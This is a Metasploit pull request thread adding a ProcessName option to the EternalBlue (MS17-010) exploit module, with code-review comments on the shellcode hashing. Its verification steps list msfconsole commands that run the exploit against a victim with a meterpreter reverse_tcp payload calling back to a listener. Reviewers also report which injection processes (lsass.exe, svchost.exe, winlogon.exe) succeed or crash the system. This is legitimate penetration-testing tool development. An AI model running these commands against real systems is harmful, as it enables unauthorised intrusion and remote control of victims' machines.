Add support for ms17_010_eternalblue ProcessName option
rapid7/metasploit-framework pull request #10792
Opened 2018-10-11 05:05 UTC by l9c

The shellcode was hardcoded to process "spoolsv.exe". This change adds support for ProcessName option by using runtime hash.

## Verification
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms17_010_eternalblue`
- [ ] `set processname lsass.exe`
- [ ] `set rhost <victim-address>`
- [ ] `set payload windows/x64/meterpreter/reverse_tcp`
- [ ] `set lhost <listener-address>`
- [ ] `run`
- [ ] `ps` to find the PID of lsass.exe
- [ ] `getpid` to check the PID

2018-10-11 05:47 UTC, wvu-r7 commented
Nice, another EB to-do down!

2018-10-30 19:59 UTC, bwatters-r7 commented
We may want to update some of the documentation.  I have experimented with a few other system processes to use for injection, and some don't work at all while others cause impressive user-visible changes.  At the minimum, I'd be for a warning on this one..... What are the thoughts on making this an advanced option?

My results (testing on a Windows 8.1x64 unpatched system):
wininit.exe: Failed
lsass.exe: Success, but OS crash on session exit when payload exit was `process`
svchost.exe: Success, occasional OS crash a few minutes after exit
winlogon.exe: Success, but occasionally logs the user out.

2018-11-01 14:43 UTC, bwatters-r7 commented
Calling out @wvu-r7 for the advanced option question......

2018-11-01 15:32 UTC, bwatters-r7 commented
Right, @wvu-r7 not sure where the line of option and _advanced_ option lies.  This could reboot a computer, so..... I figured I'd ask.

2018-11-01 15:34 UTC, wvu-r7 commented
Advanced options are more hidden to the user...

2018-11-01 15:48 UTC, wvu requested changes
@bwatters-r7: Feel free to address these.

2018-11-01 15:48 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +    process += "\x00"
This can probably be `<<`.

2018-11-01 15:48 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +    process.each_byte { |c|
This should be `do`/`end`.

2018-11-01 15:48 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +    return ( dword >> bits | dword << ( 32 - bits ) ) & 0xFFFFFFFF
No `return` needed.

2018-11-01 15:48 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +  def make_kernel_shellcode(proc_name="spoolsv.exe")
If you're not going to use keyword args, you can leave off the no-op variable name. It should be clear enough when called below.

2018-11-01 15:50 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +  def make_kernel_shellcode(proc_name="spoolsv.exe")
This is already the default.

2018-11-01 15:51 UTC, wvu-r7 commented on modules/exploits/windows/smb/ms17_010_eternalblue.rb
> +  def make_kernel_shellcode(proc_name="spoolsv.exe")
This is already the default.

2018-11-05 16:01 UTC, bwatters-r7 commented
@l9c if you want, please move the options @wvu-r7 mentioned to advanced and change the names to match convention.  Alternatively, I can do that as I land it.

2018-11-05 19:30 UTC, wvu approved these changes

2018-11-05 20:20 UTC, merged

2018-11-05 20:21 UTC, bwatters-r7 commented
# Release Notes
This PR allows users to specify into which process they would like to payload injected when using the `ms17_010_eternalblue` module.